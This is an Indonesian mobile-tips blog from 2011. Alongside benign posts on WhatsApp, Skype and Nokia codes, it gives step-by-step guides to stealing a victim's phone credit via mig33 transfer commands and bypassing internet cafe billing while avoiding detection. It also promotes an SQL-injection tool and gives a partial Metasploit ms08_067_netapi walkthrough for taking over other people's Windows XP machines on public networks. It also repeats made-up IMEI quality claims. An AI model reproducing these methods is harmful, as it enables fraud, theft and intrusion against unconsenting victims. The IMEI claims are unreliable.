Nah disini terdapat tautan untuk merubah nickname langsung saja anda tekan link GANTI (ganti saja nickname sesuai keinginan anda) setelah berhasil anda tinggal tekan saja tombol MASUK untuk membuka akun facebook anda.
.
JRENG.. ,JRENG.. ,JRENG.. ,
Nickname Akun Anda berhasil Diperbarui
.SELAMAT MENCOBA

Tuesday, April 19, 2011

WhatsApp! Aplikasi messenger untuk semua platform (blackberry,iphone,android,symbian)


whatsappMungkin informasi ini agak ketinggalan,tapi setelah diinvite oleh salah seorang teman bro teddy, tergelitik juga untuk sharing di blog sederhana ini.
WhatsApp adalah aplikasi messenger seperti BBM atau Blackberry Messenger di hp blackberry.
Aplikasi ini awalnya di buat untuk Iphone tapi kini bisa di gunakan juga di Blackberry dan hp symbian 3rd ke atas.
Karena aku ada hp nokia E63 maka langsung saja ikut menjajal aplikasi ini.

Aplikasi ini kayaknya akan jadi saingan terberat dari Blackberry Messenger .Tidak perlu email,tidak perlu pin cukup daftarkan nomer hp kita sendiri sebagai pin ,langsung dah bisa BBM-an ala nokia.
Dan jangan salah,tidak hanya bisa ke sesama nokia,kita bisa messengeran juga ke pemakai iphone,android dan ke blackberry juga!
Jadi jika punya teman yang memakai platform hp yang berbeda bisa selalu terhubung dengan aplikasi ini.
Notifikasi yang masuk juga seperti sms biasa dan ini realtime!jadi tidak seperti sms yang kadang nyampainya lama.
Kirim gambar,tone dsb nya juga bisa langsung seperti ketika chating.
Jadi lupakan sms yang lelet atau langganan paket BIS yang mahal…
Oke tak perlu panjang lebar,untuk jelasnya lihat saja beberapa screenshot di bawah ini
whatsapp
whatsapp
whatsapp
whatsapp
whatsapp
whatsapp
whatsapp
Untuk tampilan di iphone,android atau balckberry bisa lihat di scrennshot di bawah ini
whatsapp for iphone
whatsapp for iphone
whatsapp for android
whatsapp for android
whatsapp for blackberry
whatsapp for blackberry
Tapi tidak fair bila aku hanya share ke lebihannya saja.
Berikut ini ada beberapa kekurangan daripada aplikasi ini
bateray boros.
Ya karena selalu on terus 24 jam akan mengakibatkan pemakaian bateray menjadi boros.Ini juga karena beberapa hape memang tidak dibikin untuk on terus seperti hp blackberry. dan tidak ada fasilitas untuk logout atau offline,jadi gprs akan selalu aktif sepanjang hari.
Kalau pemakai wifi mah bagus kalau on terus.tapi tetap saja bateray akan cepat boros apalagi kalau hp memang tidak dibikin untuk on terus.
Tarif internet rata rata operator di indonesia juga terbilang masih mahal,untuk beberapa operator mungkin masih cukup murah tetapi operator khususnya yang aku pakai kartu im3 ,tarifnya sangat melambung tinggi
Dan aplikasi ini hanya trial selama setahun,entah di tahun yang akan datang di gratiskan atau akan berbayar.
Tapi selain semua itu tidak ada salahnya untuk mencoba aplikasi ini..
Toh kalau tidak suka bisa uninstal dan instal lagi bila perlu.
Oke silahkan download aplikasi ini di ovistore atau langsung ke webnya.
Aplikasi ini support di hp symbian V3 ke atas ,Android,Iphone,dan balckberry.
whatsapp.com/dl

Anti virus Kapersky symbian2nd database update 2011

Setelah lama hp symbian 2nd ku (nokia 6670) terbebas dari virus,beberapa hari lalu ada virus yang menghampiri.
Virus itu datang lewat kiriman bluetoeth dan secara tak sengaja aku terima dan sempat instal walau juga sempat ku cancel.Virus ini memakai samaran dengan nama file sex.mp3.

Walau sempat kucancel rasanya kuramg afdol bila tidak di scan ulang memorynya,dan ternyata dengan anti viruz avira mobile,virusnya tak terdeteksi.
Discan dengan kapersky ,baru virusnya muncul dan langsung terdelete dari system.
Anti viruz kapersky mobile memang anti virus yang paling powerfull di hp symbian 2nd.Tapi sayang updatenya cukup sulit terutama dengan licence yang sudah expired seperti punyaku.
Setelah googling akhirnya ketemu cara update antiviruz kapersky.setelah kupraktekan sukses update database terbaru tanggal 2 maret 2011.
Oke langsung saja download
Kapersky anti visuz database update 2011.zip

Silahkan baca baik2 readme.txt sebelum menginstal aplikasi ini,
Antivirus ini bisa diinstal di semua hp symbian 2nd meliputi
Nokia 6600,6670,7610,3230 dan lainnya

CARA MENGETAHUI KEASLIAN HANDPHONE NOKIA

Nokia adalah salah satu ponsel jual terbesar di seluruh dunia. Sebagian besar dari kita memiliki ponsel Nokia tetapi tidak menyadari orisinalitas itu. Apakah Anda ingin tahu apakah Anda ponsel Nokia asli atau tidak? Kemudian Anda berada di tempat yang tepat dan informasi ini secara khusus dimaksudkan untuk Anda. Your telepon Anda IMEI (International Mobile Equipment Identity) menegaskan nomor telepon orisinalitas Anda. number(serial number). Tekan tombol berikut di ponsel anda * # 06 # untuk melihat Anda Telepon’s nomor IMEI (nomor seri).
Kemudian periksa dan 8 angka 7
Telepon serial no. Xxxxxx? ? xxxxxxx ? Xxxxxxx
JIKA digit & Kedelapan Ketujuh ponsel Anda adalah 02 atau 20 ini berarti ponsel Anda telah berkumpul di Emirates yang sangat buruk kualitas
JIKA digit & Kedelapan Ketujuh ponsel Anda adalah 08 atau 80 ini berarti ponsel anda diproduksi di Jerman yang kualitas wajar
JIKA digit & Kedelapan Ketujuh ponsel Anda adalah 01 atau 10 ini berarti ponsel Anda telah diproduksi di Finlandia yang sangat baik
Mobile Quality JIKA digit & Kedelapan Ketujuh ponsel Anda 00 ini berarti ponsel Anda telah diproduksi di pabrik asli yang Kualitas terbaik Mobile
JIKA digit & Kedelapan Ketujuh ponsel Anda 13 ini berarti ponsel Anda telah dirakit di Azerbaijan yang buruk kualitas yang sangat dan juga berbahaya bagi kesehatan Anda.

CARA HACK WEBSITE DENGAN HEXJECTOR V1.07.3


Hexjector adalah Opensource, Multi-Platform PHP script untuk mengotomatisasi situs Pentest untuk SQL Injection Vulnerabilties
Fitur:
1.Check untuk Vulnerablities SQL Injection.
2.Pentest Vulnerablities SQL Injection.
3.Detect WAF di situs.
4.Scan Untuk Halaman Admin
5.Manual Dump Fungsi
6.Browser
Injeksi 7.SQL Jenis Deteksi
Download: Hexjector Sql Injection Tool
……………:”{)(*&^%$#@!###………………. ………………………………………….. ………………………………………….. ……………………….
……………:”{)(*&^%$#@!###………………. ………………………………………….. ………………………………………….. ……………………….
……………:”{)(*&^%$#@!###………………. ………………………………………….. ………………………………………….. ………………………

Tips Mencuri Pulsa Kawan

Cara Nge Hack / Membajak / Mencuri Pulsa Teman Kita Tanpa Sepengetahuannya …..
Yang Harus Di Ingat , Postingan ini Bukan Berarti Untuk Mengajarkan Kalian Yang Tidak Benar , Akan Tetapi Postingan ini Hanya Diperuntukan Untuk Pengetahuan Dan Tentunya Untuk Pembelajaran Semata. Postingan ini diambil dari forum hackcenter ….
Kalian Ikuti Cara Di Bawah ini :
1. kamu masuk aplikasi mig33 ( http://wap.mig33.com/join.php ) Tanpa Tanda Kurung , ( Gunakan Browse Mobile Anda ) Jangan Lewat PC Atau Warnet ( Notebook ) Anda,. Tanpa Tanda Kurung ,
2. Setelah Itu , Langsung Aja regristrasi ( Daftar ), kamu isi username, password, dan no hp (no. Korban yg akan kamu sedot pulsanya),
3. lalu submit, setelah itu kamu login dan pilih remind me later,
4. lalu kamu plih invite friend no tujuan kamu isi “TP(spasi)no.kamu(spasi)jumlah pulsa”( Tanpa Tanda Kutip ) , Yang Ingin Kamu Curi Dari Si Korban ,
( Yang Mesti Di Ingat , Misalkan Kamu Ingin Mencuri Pulsa Si Korban Sebanyak 50.000 , Akan Tetapi Pulsa Si Korban Hanya 20.000 , Maka Akan Terjadi Erorr ,Itu Di Karenakan Pulsa Si Korban Tidak Mencukupi Untuk Kamu Curi )
Contoh 1 :
Sebut Aja Kamu Dengan Nama Si ” A ” ( Si Pelaku Pencurian )
Dan Sebut Aja Si Korban Yang Ingin Kamu Curi Pulsa’a , Si ” B “
SI “A” —- > TP 08565555555 50000
Keterangan : Brati Si A Mencuri Pulsa Dari No Hp 08565555555 Sebanyak Rp.50.000
Si “B” —– > Sementara Si ” B ” Pulsa’a Hanya Rp. 20.000
Apabila Kaya Seperti Di Atas , Kemungkinan Akan Terjadi Erorr ,Karena Pulsa Si ” B ” Hanya Rp.20.000 Sedangkan Si ” A ” Mencuri Rp.50.000 Dari Si “B” Yang Terjadi Adalah Pulsa Si B Tidak Mencukupi Target Yang Di Minta Oleh Si “A” , Maka Terjadilah Erorr …. Tapiiii … Apabila DewiFortuna Di Pihak Anda Maka Cara Seperti ini pun Berhasil …. Maka Pulsa SI “B” Yang Rp.20.000 Tidak Tersisa Sepeserpun Untuk Si “B”.
Nah … Untuk Melakukan Yang Benar Dan Tidak Terjadi Erorr,,,, Gw Punya Tips …
Ikuti Tips Di Bawah Ini :
1. Lo Mesti Tau Betul Orang Yang Ingin Lo Curi Pulsa’a ( Untuk Percobaan ) Lo Curi Pulsa Ade Lo Atau Kaka Lo Sndri
2. Lo Mesti Pulsa Dari Ade Atau Kaka Lo Yang Ingin Di Curi
3. Ini Di Karena Agar Lo Tau Betul Dan Yang Diperlukan Dalam Teknik Ini adalah Mengira-Ngira Isi Pulsa Si “B”. Jangan Sampai Melebihi Dari Target Yang Lo Minta Ke Si “B”
Misalkan : Misal Si B Mempunyai Pulsa Rp. 30.000 , Maka Yang Harus Lo Lakuin Adalah , Jangan Melebihi Pada Saat Mencuri Pulsa Si B , Cara Seperti ini Kemungkinan 99,9% Sukses , Di Bandingkan Cara Sebelumnya ,
Contoh Yang Benar :
TP 085555555 29500 ( Maka Yang Akan Terjadi Adalah Pulsa Si “B” Hanya Kamu Sisain Rp.500 Perakkkk ….. )
Keterangan :
TP —– > Perintah Tranfer Pulsa Untuk Operator M3 , Untuk kartu lain sesuaikan kode transfernya.
085555555 —– > Nomer Hp Si Korban Yang Ingin Kamu Curi
29500 ——– > Jumlah Pulsa Yang Ingin Kamu Curi
Jangan Di Gunakan Untuk Hal-Hal Yang Tidak Benar Ya

Telepon gratis via skype di handphone

Dijaman yang serba canggih ini kita terus di manjakan oleh teknologi yang terus berkembang meringankan kinerja kita.seperti untuk urusan komunikasi,sudah ada layanan skype yang merupakan layanan telepon internet gratis .selain di pc ,kini layanan telpon gratis via skype juga bisa di lakukan langsung di handphone kita .

Tapi layanan ini agaknya cuma support di nokia generasi ke 3 alias symbian s60 v3 .
Dan pendaftarn akun skype yang dulu harus dilakukan di pc dgan mendownload aplikasi skype, kini bisa dilakukan langsung di handphone.
Terus apa bisa nelpon via skype di handphone bisa gratis?
Tentu saja ada beberapa ketentuan,misalnya kalau dalam jangkauan sinyal wifi bisa di pastikan gratis.
dan dengan paket internet yang makin murah bisa membuat telepon via skype jadi murah juga.
Dan dengan trik online via proxy yang tipsnya banyak ada di internet ,juga bisa dipastikan telepon via skype ini jadi GRATIS!!!!
Oke yang mau mencoba aplikasi skype ini silahkan download dengan aman di website ovistore.com
Masuk ke ovistore dan silahkan search “skype” di kolom pencarian.
Untuk mendownloadnya kita harus punya akun ovi dulu.cara daftarnya gampang kok.
berikut beberapa screenshotnya
skype
skype
skype
Sebenarnya di nimbuzz pun kita bisa telepon gratis via skype.
Caranya gampang .
Pertama silahkan login ke nimbuzz
Klick setting -> voip provider setting -> kemudian pilih skype out.

Thursday, April 14, 2011

Cara/Trik Hp Nokia Lengkap

1. Melihat IMEI (International Mobile Equipment Identity)
Caranya tekan * # 0 6 #

2. Melihat versi software, tanggal pembuatan softwre dan jenis kompresi software
Caranya tekan * # 0 0 0 0 #
Jika tidak berhasil coba pencet * # 9 9 9 9 #

3. Melihat status call waiting
Caranya tekan * # 4 3 #

4. Melihat nomor / nomer private number yang menghubungi ponsel anda
Caranya tekan * # 3 0 #

5. Menampilkan nomer pengalihan telepon all calls
Caranya tekan * # 2 1 #

6. Melihat nomor penelepon pada pengalihan telepon karena tidak anda jawab (call divert on)
Caranya tekan * # 6 1 #

7. Melihat nomor penelepon pada pengalihan telepon karena di luar jangkauan (call divert on)
Caranya tekan * # 6 2 #

8. Melihat nomor penelepon pada pengalihan telepon karena sibuk (call divert on)
Caranya tekan * # 6 7 #

9. Merubah logo operator pada nokia type 3310 dan 3330
Caranya tekan * # 6 7 7 0 5 6 4 6 #

10. Menampilkan status sim clock
Caranya tekan * # 7 4 6 0 2 5 6 2 5 #

11. Berpindah ke profil profile ponsel anda
Caranya tekan tombol power off tanpa ditahan

12. Merubah seting hp nokia ke default atau pabrikan
Caranya tekan * # 7 7 8 0 #

13. Melakukan reset timer ponsel dan skor game ponsel nokia
Caranya tekan * # 7 3 #

14. Melihat status call waiting
Caranya tekan * # 4 3 #

15. Melihat kode pabrik atau factory code
Caranya tekan * # 7 7 6 0 #

16. Menampilkan serial number atau nomer seri hp, tanggal pembuatan, tanggal pembelian, tanggal servis terakhir, transfer user data. Untuk keluar ponsel harus direset kembali.
Caranya tekan * # 92702689 #

17. Melihat kode pengamanan ponsel anda
Caranya tekan * # 2 6 4 0 #

18. Melihat alamat ip perangkat keras bluetooth anda
Caranya tekan * # 2 8 2 0 #

19. Mengaktifkan EFR dengan kualitas suara terbaik namun boros energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 3 3 7 0 #

20. Mengaktifkan EFR dengan kualitas suara terendah namun hemat energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 4 7 2 0 #

21. Menuju isi phone book dengan cepat di handphone nokia
Caranya tekan nomer urut lalu # contoh : 150#

22. Mengalihkan panggilan ke nomor yang dituju untuk semua panggilan
Caranya tekan * * 2 1 * Nomor Tujuan #

23. Mengalihkan panggilan ke nomor yang dituju untuk panggilan yang tidak terjawab
Caranya tekan * * 6 1 * Nomor Tujuan #

24. Mengalihkan panggilan ke nomor yang dituju untuk panggilan ketika telepon hp anda sedang sibuk
Caranya tekan * * 6 7 * Nomor Tujuan #
disadur dari Kode Tombol Rahasia Ponsel Nokia - Kunci Trik Cara Buka Secret Code Akses HP/Handphone/Telepon Selular/Seluler Nokia Anda

Tips dan Trik Menjebol Password MMC HP

Bagi Sobat semua tentunya tidak asing lagi dengan Barang yang namanya MMC.Karena MMC menyimpan banyak data dan mungkin data yang sangat penting, maka perlu melakukan pengamanan MMC dengan memasang kode password.Tetapi kadang Sobat "Blunder' alias senjata makan Tuan Passwordnya Lupa.Cara memasang kode password pada MMC sangat mudah, pilih menu ‘memory card’, pilih ‘option’ kemudian pilih ‘set password’ dan masukkan kode sesuai yang diinginkan. Tapi, apa yang terjadi jika lupa akan password yang telah dibuat? MMC tidak akan berfungsi dengan baik. Atau jika membeli ponsel dengan MMC yang terkunci oleh kode si pemilik sebelumnya? Bagaimana cara mengetahui dan menjebol MMC yang terkunci (Lock)i?

Langsung aja ikuti langkah-langkah di bawah ini :
1.Ponselnya harus memiliki aplikasi ‘explorer’ untuk melakukan pelacakan file dan folder dalam ponsel, aplikasi ini banyak sekali dan sudah sangat umum seperti misalnya SeleQ, Fexplorer, FileMan dan masih banyak lainnya. Install ke dalam memory ponsel,
2.Kemudian dengan aplikasi tersebut cari file yang bernama “MMCSTORE”, file ini biasanya terletak di folder ’C\System’
3.Jika sulit, gunakan menu ‘find’ atau ‘search’, kemudian ketikkan nama file yaitu ‘mmcstore’ dan ponsel akan mencari file tersebut.
4.Selanjutnya kirim file mmcstore tersebut ke komputer melalui infrared, Bluetooth ataupun kabel data.
5.Melalui komputer atau PC, buka file mmcstore tersebut dengan menggunakan notepad.
6.Setelah terbuka, maka pada notepad akan terlihat dengan jelas, password dari MMC tersebut.
7.Dengan password tersebut lakukan penghapusan password “Remove Password” untuk menghilangkan kunci (lock password) pada MMC.

6 Cara/ Tips melacak Private Number HP

Dalam hati sering Berkata Cumi (Cuma MisCall) mendengar bunyi telepon yang masuk ke Hp Saya dengan Private Number/No Rahasia.Kadang saya berpikir apa mungkin "Fans" y Bro? (Wekekek Berharap Cemas). Atau mungkin Juga Mantan Bro? (Berharap si dia masih mengingat kita).Y Sudahlah iseng-iseng beli Majalah Hp (Maaf tidak mau menyebutkan Merek Majalahnya karena tidak bayar Iklan) eh ternyata ada Tips Cara Melacak Private Number Hp.Mau tau Caranya Bro?Semua saya Sharing di sini di Blog "Sharing Ilmu Pengetahuan". Berikut Tips dan Trik melacak Private Number Hp.

1) Aktifkan VMB ” Voice Mail Box” kartu anda
.Jika Sobat tidak tahu cara mengaktifkan "VMB" silahkan tanya ke Operator selular sobat.Nah saat yg private number nelpon buruan deh anda matikan hape anda maka yg MC akan terhubung ke VMB td.Sabar sebentar Bro beberapa menit kemudian Hidupkan lagi HP Sobat dan tinggal tunggu sms dari server provider kartu HP Sobat yg memberitahukan bahwa anda telah dihubungi.
Catatan :
Untuk pelanggan Telkomsel tidak bisa menggunakan private number.

Ada Beberapa Cara untuk Nge-Blok Private Number (Anti Private Number) saya ambil dari Kasus tetengga sebelah dan suda di Coba ternyata berhasil :
No Kartu HP sobat Imigrasi (Kaya Perpindahan penduduk gt Bro).
Contoh Kasus : Kartu XL Jempol imigrasi ke ke XL Bebas (Bukan Ganti Kartu Perdana) Setelah di Coba ternyata no Yang Private Number bisa kelihatan.Silahkan Sobat Cek sendiri dan Share di sini Berhasil apa tidak.(Andaikata Provider XL belum meng-Upgrade Sistem-nya).

2)Jika Sobat menggunakan Jenis HP Motorola rokr e6,..pake aplikasi CALLMANAGER,..apps ini bisa ngeblock private number atau nomer lain yang kita kehendakin,..di sana juga ada pengeturan di mana hp bisa ngirim SMS secara otomatis kepada nomer yg di blok,..dengan sms yang sudah kita setting sebelumnya.Silahkan Searching di Download.com

3)Ada juga aplikasi DATA SAFE,..aplikasi ini,…adalah aplikasi secure phone,..yang mana fungsinya banyak banget di antaranya :
  • HP akan secara otomatis mengirim pesan,ke nomer tertentu yg udah kita set,..jika SIM card nya di ganti( misal hape di curi ,bisa di lacak bro,…setiap kurang dari 10 detik HP akan mengirim sms,..yang isinya tentang kegiatan HP tsb,..misal HP tsb udah di pake buat nelpon sapa aja,,dan di telpon sapa aja,..bisa ketahuan broooo…)
  • SMS dari satu sim card tidak akan ketahuan / terbaca,bila HP di masukin sim car lain,..No HP juga lho,…jadi aman kalo misal hape di pinjem temen,..sms kita ama daftar no hape,..gak bakal di isengin ma temen
  • Bisa back up seluruh kontak dan sms ke memory card silahkan di coba bagi yg punya hp rokr e6

4) Kl0 HP Sobat s0nyericss0n, untuk mem-black list private number cukup pake ‘accept call 0nly fr0m list’ aja. Standarnya all callers. Kl0 k0ntaknya banyak, bikin k0ntak gr0up dlu aja. Ingat..n0m0r baru juga gak bisa telef0n ke kita, spd telf dari wartel dsbnya.

5) Menggunakan Aplikasi Best Blacklist
whitelist dan blacklist. Whitelist menolak panggilan yang nomernya tidak didaftarkan sementara Blacklist menolak nomer yang kamu daftarkan.
Private number?? Tidak masalah, saat dalam mode blacklist kamu bisa menolaknya, dan saat mode whitelist otomatis akan ditolak.Download Disini
Tipe ponsel yang mendukung adalah
LG KS10 (Joy), LG KT610, LG KT615,
Nokia 3250, Nokia 5320, Nokia 5500 Sport,
Nokia 5700, Nokia 6110 Navigator, Nokia 6120,
Nokia 6121, Nokia 6124, Nokia 6210,
Nokia 6220, Nokia 6290, Nokia 6650,
Nokia E50, Nokia E51, Nokia E60,
Nokia E61, Nokia E61i, Nokia E62,
Nokia E63, Nokia E65, Nokia E66,
Nokia E70, Nokia E71, Nokia E90,
Nokia N71, Nokia N73, Nokia N75,
Nokia N76, Nokia N77, Nokia N78,
Nokia N79, Nokia N80, Nokia N81,
Nokia N81 8GB, Nokia N82, Nokia N85,
Nokia N91, Nokia N91 8GB, Nokia N92,
Nokia N93, Nokia N93i, Nokia N95,
Nokia N95 8GB, Nokia N96, Samsung I7710,
Samsung Innov8 (i8510), Samsung SGH-G810, Samsung SGH-i400,
Samsung SGH-i450, Samsung SGH-i520, Samsung SGH-i550,
Samsung SGH-i560, Samsung SGH-i570, Samsung SGH-L870
Jika Hp Sobat Sesuai dengan Tipe HP yang di atas Cek Saja ke TKP.

6) Memanfaatkan situs DiSini
Informasi yang hanya akan anda peroleh adalah asal kota lokasi berdasarkan kode kota untuk nomor HP saja.

Hack Billing Warnet

Zhider Software
Pertama-2 kita harus mengetahui cara kerja dari billing warnet itu sendiri, sebenarnya pas kita datang ke warnet dan duduk terus hidupin komputer, di layar biasanya akan tampak screen dari billing, dan keybord akan dikunci untuk menekan tombol Ctrl-Alt-Del, Alt-tab, Alt-F4 atau sebagainya yang hanya bisa digunakan buat si admin, dalam keadaan seperti itu sebenarnya sikomputer sudah siap pake alias stand by, tapi kita di paksa untuk login di billing sialan itu, hmm dari situ berarti kita harus menghilangkan atau mengusir si billing dari permukaan layar, nah..nah..nah mari kita mulai, untuk menghilangkan si billing gila dari bumi ini, kita memerlukan software untuk menyembunyikan program yg bernama [ ZHider ], software itu dapat di Download diSini atau situsnya cari sendiri di mas google ya! lupa lagi uy dan ga berat ko! kurang lebih cuman 81KB.
Udah dapet softwarenya? Mari kita mulai, datanglah ke warnet yg jarang kamu datengin, karena biar si pawang warnet ga terlalu kenal sama kamu, carilah tempat duduk yang agak pojok dan usahakan warnet tersebut jangan terlalu kosong dan jangan terlalu penuh, karena kalo kosong nanti si pawang warnet heran ko ada yang maen tapi di billing kosong, dan jangan juga terlalu penuh ntar dia heran juga, ada yg datang mau maen terus liat di billing server ada yg kosong, eh, pas di liat ada mahluk usil lagi nongkrong di warnetnya. Nah, udah di pastikan kondisimu aman duduklah dengan tenang dan jangan tampakan wajah tegangmu karena takut ketahuan, pasang wajah innocence muka belas kasihan dan pengen di bogem mentah !! hehehe…
(yg terakhir ga lah)udah gitu masukin flashdiskmu yg udah terisi software ZHider, tunggu sampe ke detect, dan kamu login kyk biasanya, lalu buka flashdiskmu jalankan program Zhider dan stop lagi pemakaian billing, kalo dalam waktu segitu biasanya billing masih menandakan free alias gratis, nah billing gila itu udah tampak lagi di layar, sedangkan program Zhider kita berarti udah jalan, ok, mari kita jalankan aksi mendebarkan ini, tekan tombol Ctrl-Alt-Z dan taarraaaaaa…. si billing gila itu hilang!!! Dan kamu bebas browsing sepuasnya….
Kalo kamu udah selesai, tekan tombol Ctrl-Alt-X untuk menampilkan lagi si billing, dan login lagi seperti biasa dan kamu maen seperti biasa sampe batas yg kamu mau dan bayar ke si pawang untuk menghilangkan kecurigaannya.
Bahan2 harus disiapkan:
  • Program ZHider. download diSini
  • Muka bego
  • Mental yang kuat
Langkah-langkahnya:
  • Masuk warnet dan pasang muka bego biar ga dicurigai operator
  • Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
  • Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
  • Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
  • Saat masuk login screen, login aja seperti biasa.
  • Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
  • Setelah ZHider dijalankan langsung aja logout.
  • Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
  • Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
  • Kalo sudah puass tekan Ctrl+Alt+X untuk memunculkan kembali login screen yang menghilang entah kemana
  • Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
  • Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
  • CTRL+ALT+Z Menyembunyikan jendela aktif
  • CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
  • CTRL+ALT+L Menampilkan dialog zhider
  • CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Cara 2:
Nyalain kompi .Setelah loading windows tekan tahan Ctrl+Alt+Del sebelum keluar jendela billing(harus cepet coz jendela billing muncul hanya 2 detik setelah loading windows). Setelah kluar task manager klik [ End Task ] pada aplikasi [ client 008 ].
Cara 3:
Menggunakan software Billing Hack(bisa download di www.vb-bego.com). Software ini bahkan bisa mereset time billing.
Bisa juga sebelum nyalain kompi cabut kabel LAN di belakang CPU. Biar gak terlalu mencurigakan, cabut kabelnya sambil pura-pura pasang USB ato Flash Disk (sambil nyelam mancing ikan gitu deh pepatahnya).Trus nyalain kompi tunggu sampai jendelabilling keluar. Klik Admin masukkan password default008. Trus di Exit Client &Password masukkan juga password 008. Abis tu, setelah muncul kotak yang terakhir cari tanda ****** yang letaknya paling bawah kiri, delet tanda tsb dan terakhirklik Exit Client yang terletak di sebelah kanan tanda yang telah kita hapus tadi. Jadi deh….
Kalo semua cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhoi Tuhan Kalo ketahuan langsung pertebal [muka bego-mu].  Misalnya bilang… Eh, kok jadi gini ya? Kemaren ga gini kok. Ato kata-kata lain, tergantung kreatifitas kamu.

Wednesday, April 13, 2011

Menyusup dan Menguasai Kedalam Sistem Operasi Komputer Orang Lain

kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:


1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru...ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa
anda bayangkan kan...
kita bisa mengambil chips orang dengan mudah dan menjualnya dengan senang hati..... karna AKUN ANDA ADA PADA KAMI ...hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )... eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahua ( mulai mi muncul tanduknya kepalaku) hahahahahaha

2.> bagaimana caranya, ..hehehe AJAR DULUEE ...hehhe pasti begitu tooo... huahuahuahuahuahuahuahuahua....
so lanjut ke TKP
============================================
yang kita mesti sediakan adalah beberapa alat bantu , yang bisa anda dapatkan secara GRATIS...
- OS BACKTRACK ( terserah Backtrack 3 Or 4 ) hehehehe (http://indobacktrack.or.id/2009/02/mirror-link-lokal-download-backtrack-4-iso/)
- John the Ripper (http://www.openwall.com/john/)
- pwdump6 ( http://www.foofus.net/fizzgig/pwdump/ )
- Trojan Buatan Sendiri atau keylogeer atau apalahhhh
- kopi panas
- pisang goreng atau roti bakar ( yang rasa keju lebih enak )
- ROKOK SAMPOERNA ^_^!!! huahuahua

Sudah lengkap..?!
sekarang Kita mulai exploited memakai metasploit yang sudah include di backtrack
Untuk lebih memahami tentang Xploited , silahkan kunjungi http://www.metasploit.com/, karna saya tidak akan membahas bahasan Perintah yang akan kita gunakan ( ededeh panjang sekali kiii )

Pertama kita masuk dulu ces ke konsole( itueee klo di windows namanya CMD ) , nah klo sudah terbuka, ketik :
uing~BT#msfconsole

Untuk Melihat Lihat list exploits-nya , gunakan perintah :
msf > show exploits
windows/smb/ms05_039_pnp Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption

Wokehlah kalo begitu....sekarang kita Mulai menScan Komputer Target Kita...heehhehehheheh tapi untuk lebih menyakinkan saya melihat IP Kita,.huahuahua ternyata ip kita ni bagus Juga Yah : 192.168.1.20 :

msf > sudo nmap -v -sS -A -O 192.168.1.28
[*] exec: sudo nmap -v -sS -A -O 192.168.1.28
[sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2010-01-08 23:50 CIT
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.28 [1 port]
Host 192.168.1.28 appears to be up ... good.
Interesting ports on 192.168.1.28:
Not shown: 1712 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds <------
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows

Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka ( lihat Yang ada Tanda Panah <---- ). Mari kita coba masuk ke komputer ini dengan menggunakan :
exploit windows/smb/ms08_067_netapi.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan mengetikkan
show options :
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
rhost => 192.168.1.28

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :
